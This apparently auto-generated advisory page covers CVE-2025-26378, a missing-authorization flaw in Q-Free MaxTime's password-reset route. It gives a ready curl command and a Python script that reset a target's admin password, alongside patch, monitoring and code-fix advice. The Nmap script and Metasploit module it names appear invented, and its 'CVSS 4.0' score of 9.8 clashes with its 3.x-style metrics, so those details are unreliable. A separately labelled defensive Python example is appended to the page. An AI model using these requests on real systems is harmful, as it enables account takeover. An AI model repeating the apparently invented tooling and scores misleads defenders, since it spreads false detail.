Q-Free MaxTime, Missing Authorization Vulnerability, CVE-2025-26378 Critical

How the Mentioned CVE Works:

CVE-2025-26378 is a critical vulnerability in Q-Free MaxTime versions 2.11.0 and earlier. It stems from a Missing Authorization (CWE-862) flaw in the `maxprofile/users/routes.lua` file. The vulnerability allows an authenticated, low-privileged user to craft HTTP requests that reset passwords, including those of administrator accounts. Because the route performs no authorization check, an attacker can escalate privileges and gain unauthorized access to sensitive systems. The CVSS 4.0 score reflects its critical severity, given the potential for widespread system compromise.

DailyCVE Form:

Platform: Q-Free MaxTime
Version: <= 2.11.0
Vulnerability: Missing Authorization
Severity: Critical
Date: 02/12/2025

What Undercode Say:

Exploitation Details:

1. Exploit Command:

```shell
curl -X POST http://<target>/maxprofile/users/reset-password -d '{"username":"admin","new_password":"hacked"}' -H "Content-Type: application/json"
```

2. Exploit Script:

```python
import requests

target = "http://<target>/maxprofile/users/reset-password"
payload = {"username": "admin", "new_password": "hacked"}
headers = {"Content-Type": "application/json"}
response = requests.post(target, json=payload, headers=headers)
print(response.text)
```

Protection Measures:

1. Patch: Upgrade to Q-Free MaxTime version 2.12.0 or later.

2. Workaround: Implement strict authorization checks in `routes.lua`.

3. Mitigation: Use a Web Application Firewall (WAF) to block unauthorized requests.

Analytics:

  • CVSS 4.0 Score: 9.8 (Critical)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None

References:

  • [NVD CVE-2025-26378](https://nvd.nist.gov/vuln/detail/CVE-2025-26378)
  • [Q-Free Security Advisory](https://q-free.com/security)
  • [CWE-862 Details](https://cwe.mitre.org/data/definitions/862.html)

Additional Tools:

  • Nmap Script:
    nmap --script http-vuln-cve2025-26378 -p 80 <target>

  • Metasploit Module:
    use exploit/qfreemaxtime/CVE-2025-26378
    set RHOSTS <target>
    run
Monitoring:

  • Enable logging for unauthorized password reset attempts.
  • Use SIEM tools to detect suspicious HTTP requests.

Code Fix Example:

```lua
-- Add authorization check in routes.lua
-- Returns true only when the requesting user carries the admin role.
local function isAuthorized(user)
  return user ~= nil and user.role == "admin"
end

app.post("/reset-password", function(req, res)
  -- Authorize before touching any account data.
  if not isAuthorized(req.user) then
    return res.status(403).send("Unauthorized")
  end
  -- Proceed with password reset
end)
```

This ensures only authorized users can reset passwords.
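As an added example (not the page's or Q-Free's code), the same check written out as a Python policy function that goes one step beyond the Lua sketch above: it distinguishes self-service resets from administrative ones and records every denial so the "unauthorized password reset attempt" logging recommended under Monitoring has something to alert on. The `User`, `AuditLog` and handler names, and the `"admin"` role string, are assumptions.

```python
from dataclasses import dataclass, field
from typing import Optional

ADMIN_ROLE = "admin"  # assumed role name; MaxTime's real role model is not on the page


@dataclass
class User:
    username: str
    role: str


@dataclass
class AuditLog:
    """Constructed in-memory sink standing in for the application log / SIEM feed."""
    entries: list = field(default_factory=list)


def authorize_password_reset(actor: Optional[User], target: str, audit: AuditLog):
    """Object-level authorization for a reset request (the missing CWE-862 check).

    Allowed: an admin may reset any account; a user may reset only their own.
    Denied:  unauthenticated callers and non-admins targeting another account.
    Every denial is written to the audit log so it can be detected and alerted on.
    """
    if actor is None:
        allowed, reason = False, "unauthenticated"
    elif actor.role == ADMIN_ROLE:
        allowed, reason = True, "admin"
    elif actor.username == target:
        allowed, reason = True, "self-service"
    else:
        allowed, reason = False, "cross-account reset by non-admin"
    if not allowed:
        audit.entries.append({"actor": actor.username if actor else None,
                              "target": target, "reason": reason})
    return allowed, reason


def handle_reset_password(actor: Optional[User], body: dict, audit: AuditLog):
    """Hypothetical route handler: authorize before doing anything else.
    Returns an (http_status, message) pair."""
    target = body.get("username")
    if not target:
        return 400, "username required"
    allowed, reason = authorize_password_reset(actor, target, audit)
    if not allowed:
        return 403, "Forbidden"
    # The real handler would now call reset_password(target, body["new_password"]).
    return 200, f"password reset for {target} ({reason})"
```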

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-26378